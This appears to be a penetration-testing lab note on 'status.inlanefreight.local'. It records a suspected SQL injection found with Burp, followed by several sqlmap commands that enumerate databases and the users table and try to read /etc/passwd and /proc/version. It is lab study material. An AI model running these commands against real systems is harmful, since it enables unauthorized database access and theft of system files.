## `status.inlanefreight.local`
- nothing here ![[images/Pasted image 20260628153106.png]]
- hit search ![[images/Pasted image 20260628211142.png]]
- `request:response` in Burp ![[images/Pasted image 20260628211158.png]]
- run `sqlmap`, as the search request looks like a likely SQLi ![[images/Pasted image 20260628211426.png]]
- enum dbs and current user
```bash
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --dbs --current-db --is-dba --banner
```
![[images/Pasted image 20260629203050.png]]
- `status` is a non-default db; let's enum its tables ![[images/Pasted image 20260629203205.png]]
- `users` table ![[images/Pasted image 20260629203637.png]]
- nothing in `company` table
- unable to read files with `--file-read`
```bash
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/proc/version
```
![[images/Pasted image 20260629204112.png]]